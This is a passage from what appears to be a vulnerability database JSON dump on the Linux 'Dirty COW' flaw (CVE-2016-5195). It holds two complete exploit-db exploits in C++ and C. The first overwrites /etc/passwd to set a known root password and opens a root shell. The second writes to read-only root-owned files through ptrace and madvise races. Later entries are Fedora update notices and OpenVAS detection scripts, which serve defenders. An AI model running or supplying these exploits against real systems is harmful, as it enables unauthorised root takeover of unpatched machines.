to the Free Software Foundation,\r\n// Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA\r\n// -----------------------------------------------------------------\r\n\r\n#include <iostream>\r\n#include <fstream>\r\n#include <string>\r\n#include <thread>\r\n#include <sys/mman.h>\r\n#include <fcntl.h>\r\n#include <unistd.h>\r\n#include <sys/types.h>\r\n#include <pwd.h>\r\n#include <pty.h>\r\n#include <string.h>\r\n#include <termios.h>\r\n#include <sys/wait.h>\r\n#include <signal.h>\r\n\r\n#define BUFFSIZE 1024\r\n#define PWDFILE \"/etc/passwd\"\r\n#define BAKFILE \"./.ssh_bak\"\r\n#define TMPBAKFILE \"/tmp/.ssh_bak\"\r\n#define PSM \"/proc/self/mem\"\r\n#define ROOTID \"root:\"\r\n#define SSHDID \"sshd:\"\r\n#define MAXITER 300\r\n#define DEFPWD \"$6$P7xBAooQEZX/ham$9L7U0KJoihNgQakyfOQokDgQWLSTFZGB9LUU7T0W2kH1rtJXTzt9mG4qOoz9Njt.tIklLtLosiaeCBsZm8hND/\"\r\n#define TXTPWD \"dirtyCowFun\\n\"\r\n#define DISABLEWB \"echo 0 > /proc/sys/vm/dirty_writeback_centisecs\\n\"\r\n#define EXITCMD \"exit\\n\"\r\n#define CPCMD \"cp \"\r\n#define RMCMD \"rm \"\r\n\r\nusing namespace std;\r\n\r\nclass Dcow{\r\n private:\r\n bool run, rawMode, opShell, restPwd;\r\n void *map;\r\n int fd, iter, master, wstat;\r\n string buffer, etcPwd, etcPwdBak,\r\n root, user, pwd, sshd;\r\n thread *writerThr, *madviseThr, *checkerThr;\r\n ifstream *extPwd;\r\n ofstream *extPwdBak;\r\n struct passwd *userId;\r\n pid_t child; \r\n char buffv[BUFFSIZE];\r\n fd_set rfds;\r\n struct termios termOld, termNew;\r\n ssize_t ign;\r\n\r\n void exitOnError(string msg);\r\n public:\r\n Dcow(bool opSh, bool rstPwd);\r\n ~Dcow(void);\r\n int expl(void); \r\n};\r\n\r\nDcow::Dcow(bool opSh, bool rstPwd) : run(true), rawMode(false), opShell(opSh), restPwd(rstPwd),\r\n iter(0), wstat(0), root(ROOTID), pwd(DEFPWD), sshd(SSHDID), writerThr(nullptr),\r\n madviseThr(nullptr), checkerThr(nullptr), extPwd(nullptr), extPwdBak(nullptr), \r\n child(0){ \r\n userId = getpwuid(getuid());\r\n user.append(userId->pw_name).append(\":\");\r\n extPwd = new ifstream(PWDFILE); \r\n while (getline(*extPwd, buffer)){\r\n buffer.append(\"\\n\");\r\n etcPwdBak.append(buffer);\r\n if(buffer.find(root) == 0){\r\n etcPwd.insert(0, root).insert(root.size(), pwd);\r\n etcPwd.insert(etcPwd.begin() + root.size() + pwd.size(), \r\n buffer.begin() + buffer.find(\":\", root.size()), buffer.end());\r\n }else if(buffer.find(user) == 0 || buffer.find(sshd) == 0 ){\r\n etcPwd.insert(0, buffer);\r\n }else{\r\n etcPwd.append(buffer);\r\n }\r\n }\r\n extPwdBak = new ofstream(restPwd ? TMPBAKFILE : BAKFILE);\r\n extPwdBak->write(etcPwdBak.c_str(), etcPwdBak.size());\r\n extPwdBak->close();\r\n fd = open(PWDFILE,O_RDONLY);\r\n map = mmap(nullptr, etcPwdBak.size(), PROT_READ,MAP_PRIVATE, fd, 0);\r\n}\r\n\r\nDcow::~Dcow(void){\r\n extPwd->close();\r\n close(fd);\r\n delete extPwd; delete extPwdBak; delete madviseThr; delete writerThr; delete checkerThr;\r\n if(rawMode) tcsetattr(STDIN_FILENO, TCSANOW, &termOld);\r\n if(child != 0) wait(&wstat); \r\n}\r\n\r\nvoid Dcow::exitOnError(string msg){\r\n cerr << msg << endl;\r\n // if(child != 0) kill(child, SIGKILL);\r\n throw new exception();\r\n}\r\n\r\nint Dcow::expl(void){\r\n madviseThr = new thread([&](){ while(run){ madvise(map, etcPwdBak.size(), MADV_DONTNEED);} });\r\n writerThr = new thread([&](){ int fpsm = open(PSM,O_RDWR); \r\n while(run){ lseek(fpsm, reinterpret_cast<off_t>(map), SEEK_SET); \r\n ign = write(fpsm, etcPwd.c_str(), etcPwdBak.size()); }\r\n });\r\n checkerThr = new thread([&](){ while(iter <= MAXITER){ \r\n extPwd->clear(); extPwd->seekg(0, ios::beg); \r\n buffer.assign(istreambuf_iterator<char>(*extPwd),\r\n istreambuf_iterator<char>());\r\n if(buffer.find(pwd) != string::npos && \r\n buffer.size() >= etcPwdBak.size()){\r\n run = false; break;\r\n }\r\n iter ++; usleep(300000);\r\n }\r\n run = false;\r\n });\r\n\r\n cerr << \"Running ...\" << endl;\r\n madviseThr->join();\r\n writerThr->join();\r\n checkerThr->join();\r\n\r\n if(iter <= MAXITER){ \r\n child = forkpty(&master, nullptr, nullptr, nullptr);\r\n\r\n if(child == -1) exitOnError(\"Error forking pty.\");\r\n\r\n if(child == 0){ \r\n execlp(\"su\", \"su\", \"-\", nullptr);\r\n exitOnError(\"Error on exec.\");\r\n }\r\n\r\n if(opShell) cerr << \"Password overridden to: \" << TXTPWD << endl;\r\n memset(buffv, 0, BUFFSIZE);\r\n ssize_t bytes_read = read(master, buffv, BUFFSIZE - 1);\r\n if(bytes_read <= 0) exitOnError(\"Error reading su prompt.\");\r\n cerr << \"Received su prompt (\" << buffv << \")\" << endl; \r\n\r\n if(write(master, TXTPWD, strlen(TXTPWD)) <= 0) \r\n exitOnError(\"Error writing pwd on tty.\");\r\n\r\n if(write(master, DISABLEWB, strlen(DISABLEWB)) <= 0) \r\n exitOnError(\"Error writing cmd on tty.\");\r\n\r\n if(!opShell){\r\n if(write(master, EXITCMD, strlen(EXITCMD)) <= 0) \r\n exitOnError(\"Error writing exit cmd on tty.\");\r\n }else{\r\n if(restPwd){\r\n string restoreCmd = string(CPCMD).append(TMPBAKFILE).append(\" \").append(PWDFILE).append(\"\\n\");\r\n if(write(master, restoreCmd.c_str(), restoreCmd.size()) <= 0) \r\n exitOnError(\"Error writing restore cmd on tty.\");\r\n restoreCmd = string(RMCMD).append(TMPBAKFILE).append(\"\\n\");\r\n if(write(master, restoreCmd.c_str(), restoreCmd.size()) <= 0) \r\n exitOnError(\"Error writing restore cmd (rm) on tty.\");\r\n }\r\n\r\n if(tcgetattr(STDIN_FILENO, &termOld) == -1 )\r\n exitOnError(\"Error getting terminal attributes.\");\r\n \r\n termNew = termOld;\r\n termNew.c_lflag &= static_cast<unsigned long>(~(ICANON | ECHO));\r\n \r\n if(tcsetattr(STDIN_FILENO, TCSANOW, &termNew) == -1)\r\n exitOnError(\"Error setting terminal in non-canonical mode.\");\r\n rawMode = true;\r\n \r\n while(true){\r\n FD_ZERO(&rfds);\r\n FD_SET(master, &rfds);\r\n FD_SET(STDIN_FILENO, &rfds);\r\n \r\n if(select(master + 1, &rfds, nullptr, nullptr, nullptr) < 0 )\r\n exitOnError(\"Error on select tty.\");\r\n \r\n if(FD_ISSET(master, &rfds)) {\r\n memset(buffv, 0, BUFFSIZE);\r\n bytes_read = read(master, buffv, BUFFSIZE - 1);\r\n if(bytes_read <= 0) break;\r\n if(write(STDOUT_FILENO, buffv, bytes_read) != bytes_read)\r\n exitOnError(\"Error writing on stdout.\");\r\n }\r\n \r\n if(FD_ISSET(STDIN_FILENO, &rfds)) {\r\n memset(buffv, 0, BUFFSIZE);\r\n bytes_read = read(STDIN_FILENO, buffv, BUFFSIZE - 1);\r\n if(bytes_read <= 0) exitOnError(\"Error reading from stdin.\");\r\n if(write(master, buffv, bytes_read) != bytes_read) break;\r\n }\r\n }\r\n }\r\n }\r\n \r\n return [](int ret, bool shell){ \r\n string msg = shell ? \"Exit.\\n\" : string(\"Root password is: \") + TXTPWD + \"Enjoy! :-)\\n\";\r\n if(ret <= MAXITER){cerr << msg; return 0;}\r\n else{cerr << \"Exploit failed.\\n\"; return 1;} \r\n }(iter, opShell);\r\n}\r\n\r\nvoid printInfo(char* cmd){\r\n cerr << cmd << \" [-s] [-n] | [-h]\\n\" << endl;\r\n cerr << \" -s open directly a shell, if the exploit is successful;\" << endl;\r\n cerr << \" -n combined with -s, doesn't restore the passwd file.\" << endl;\r\n cerr << \" -h print this synopsis;\" << endl;\r\n cerr << \"\\n If no param is specified, the program modifies the passwd file and exits.\" << endl;\r\n cerr << \" A copy of the passwd file will be create in the current directory as .ssh_bak\" << endl;\r\n cerr << \" (unprivileged user), if no parameter or -n is specified.\\n\" << endl;\r\n exit(1);\r\n}\r\n\r\nint main(int argc, char** argv){\r\n const char flags[] = \"shn\";\r\n int c;\r\n bool opShell = false,\r\n restPwd = true;\r\n\r\n opterr = 0;\r\n while ((c = getopt(argc, argv, flags)) != -1){\r\n switch (c){\r\n case 's':\r\n opShell = true;\r\n break;\r\n case 'n':\r\n restPwd = false;\r\n break;\r\n case 'h':\r\n printInfo(argv[0]);\r\n break;\r\n default:\r\n cerr << \"Invalid parameter.\" << endl << endl;\r\n printInfo(argv[0]);\r\n }\r\n }\r\n\r\n if(!restPwd && !opShell){\r\n cerr << \"Invalid parameter: -n requires -s\" << endl << endl;\r\n printInfo(argv[0]);\r\n }\r\n\r\n Dcow dcow(opShell, restPwd);\r\n return dcow.expl();\r\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/40847/"}, {"lastseen": "2016-11-28T21:23:36", "description": "Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (Write Access). CVE-2016-5195. Local exploit for Linux platform", "published": "2016-10-26T00:00:00", "type": "exploitdb", "title": "Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (Write Access)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2016-10-26T00:00:00", "id": "EDB-ID:40838", "href": "https://www.exploit-db.com/exploits/40838/", "sourceData": "// $ echo pikachu|sudo tee pokeball;ls -l pokeball;gcc -pthread pokemon.c -o d;./d pokeball miltank;cat pokeball\r\n#include <fcntl.h> //// pikachu\r\n#include <pthread.h> //// -rw-r--r-- 1 root root 8 Apr 4 12:34 pokeball\r\n#include <string.h> //// pokeball\r\n#include <stdio.h> //// (___)\r\n#include <stdint.h> //// (o o)_____/\r\n#include <sys/mman.h> //// @@ ` \\ \r\n#include <sys/types.h> //// \\ ____, /miltank\r\n#include <sys/stat.h> //// // //\r\n#include <sys/wait.h> //// ^^ ^^\r\n#include <sys/ptrace.h> //// mmap bc757000\r\n#include <unistd.h> //// madvise 0\r\n////////////////////////////////////////////// ptrace 0\r\n////////////////////////////////////////////// miltank\r\n//////////////////////////////////////////////\r\nint f ;// file descriptor\r\nvoid *map ;// memory map\r\npid_t pid ;// process id\r\npthread_t pth ;// thread\r\nstruct stat st ;// file info\r\n//////////////////////////////////////////////\r\nvoid *madviseThread(void *arg) {// madvise thread\r\n int i,c=0 ;// counters\r\n for(i=0;i<200000000;i++)//////////////////// loop to 2*10**8\r\n c+=madvise(map,100,MADV_DONTNEED) ;// race condition\r\n printf(\"madvise %d\\n\\n\",c) ;// sum of errors\r\n }// /madvise thread\r\n//////////////////////////////////////////////\r\nint main(int argc,char *argv[]) {// entrypoint\r\n if(argc<3)return 1 ;// ./d file contents\r\n printf(\"%s \\n\\\r\n (___) \\n\\\r\n (o o)_____/ \\n\\\r\n @@ ` \\\\ \\n\\\r\n \\\\ ____, /%s \\n\\\r\n // // \\n\\\r\n ^^ ^^ \\n\\\r\n\", argv[1], argv[2]) ;// dirty cow\r\n f=open(argv[1],O_RDONLY) ;// open read only file\r\n fstat(f,&st) ;// stat the fd\r\n map=mmap(NULL ,// mmap the file\r\n st.st_size+sizeof(long) ,// size is filesize plus padding\r\n PROT_READ ,// read-only\r\n MAP_PRIVATE ,// private mapping for cow\r\n f ,// file descriptor\r\n 0) ;// zero\r\n printf(\"mmap %lx\\n\\n\",(unsigned long)map);// sum of error code\r\n pid=fork() ;// fork process\r\n if(pid) {// if parent\r\n waitpid(pid,NULL,0) ;// wait for child\r\n int u,i,o,c=0,l=strlen(argv[2]) ;// util vars (l=length)\r\n for(i=0;i<10000/l;i++)//////////////////// loop to 10K divided by l\r\n for(o=0;o<l;o++)//////////////////////// repeat for each byte\r\n for(u=0;u<10000;u++)////////////////// try 10K times each time\r\n c+=ptrace(PTRACE_POKETEXT ,// inject into memory\r\n pid ,// process id\r\n map+o ,// address\r\n *((long*)(argv[2]+o))) ;// value\r\n printf(\"ptrace %d\\n\\n\",c) ;// sum of error code\r\n }// otherwise\r\n else {// child\r\n pthread_create(&pth ,// create new thread\r\n NULL ,// null\r\n madviseThread ,// run madviseThred\r\n NULL) ;// null\r\n ptrace(PTRACE_TRACEME) ;// stat ptrace on child\r\n kill(getpid(),SIGSTOP) ;// signal parent\r\n pthread_join(pth,NULL) ;// wait for thread\r\n }// / child\r\n return 0 ;// return\r\n }// / entrypoint\r\n//////////////////////////////////////////////", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/40838/"}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "The kernel meta package ", "modified": "2016-10-22T17:20:39", "published": "2016-10-22T17:20:39", "id": "FEDORA:800BC60776C5", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: kernel-4.7.9-200.fc24", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "The kernel meta package ", "modified": "2016-10-22T12:53:27", "published": "2016-10-22T12:53:27", "id": "FEDORA:6A06E60877B7", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: kernel-4.8.3-300.fc25", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "The kernel meta package ", "modified": "2016-10-23T22:49:20", "published": "2016-10-23T22:49:20", "id": "FEDORA:9A84E605A374", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: kernel-4.7.9-100.fc23", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:35:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-12-05T00:00:00", "id": "OPENVAS:1361412562310842975", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842975", "type": "openvas", "title": "Ubuntu Update for linux USN-3107-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux USN-3107-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842975\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-05 09:53:03 +0100 (Mon, 05 Dec 2016)\");\n script_cve_id(\"CVE-2016-5195\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3107-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that a race condition\n existed in the memory manager of the Linux kernel when handling copy-on-write\n breakage of private read-only memory mappings. A local attacker could use this\n to gain administrative privileges.\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 16.10\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3107-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3107-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.10\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-26-generic\", ver:\"4.8.0-26.28\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-26-generic-lpae\", ver:\"4.8.0-26.28\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-26-lowlatency\", ver:\"4.8.0-26.28\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-26-powerpc-e500mc\", ver:\"4.8.0-26.28\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-26-powerpc-smp\", ver:\"4.8.0-26.28\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-26-powerpc64-emb\", ver:\"4.8.0-26.28\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:49", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-10-21T00:00:00", "id": "OPENVAS:1361412562310842920", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842920", "type": "openvas", "title": "Ubuntu Update for linux USN-3104-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux USN-3104-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842920\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-10-21 05:54:02 +0200 (Fri, 21 Oct 2016)\");\n script_cve_id(\"CVE-2016-5195\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3104-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that a race condition\n existed in the memory manager of the Linux kernel when handling copy-on-write\n breakage of private read-only memory mappings. A local attacker could use this\n to gain administrative privileges.\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3104-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3104-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-113-generic\", ver:\"3.2.0-113.155\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-113-generic-pae\", ver:\"3.2.0-113.155\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-113-highbank\", ver:\"3.2.0-113.155\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-113-omap\", ver:\"3.2.0-113.155\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-113-powerpc-smp\", ver:\"3.2.0-113.155\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-113-powerpc64-smp\", ver:\"3.2.0-113.155\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-113-virtual\", ver:\"3.2.0-113.155\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-10-21T00:00:00", "id": "OPENVAS:1361412562310842926", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842926", "type": "openvas", "title": "Ubuntu Update for linux-snapdragon USN-3106-4", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-snapdragon USN-3106-4\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842926\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-10-21 05:54:08 +0200 (Fri, 21 Oct 2016)\");\n script_cve_id(\"CVE-2016-5195\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-snapdragon USN-3106-4\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-snapdragon'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that a race condition\n existed in the memory manager of the Linux kernel when handling copy-on-write\n breakage of private read-only memory mappings. A local attacker could use this\n to gain administrative privileges.\");\n script_tag(name:\"affected\", value:\"linux-snapdragon on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3106-4\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3106-4/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1032-snapdragon\", ver:\"4.4.0-1032.36\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-5195"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-11-14T00:00:00", "id": "OPENVAS:1361412562310809956", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809956", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2016-c3558808cd", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2016-c3558808cd\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809956\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-11-14 18:00:31 +0530 (Mon, 14 Nov 2016)\");\n script_cve_id(\"CVE-2016-5195\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2016-c3558808cd\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 23\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-c3558808cd\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/W3APRVDVPDBXLH4DC5UKZVCR742MJIM3\");\n script_tag(name:\"solution_type\", 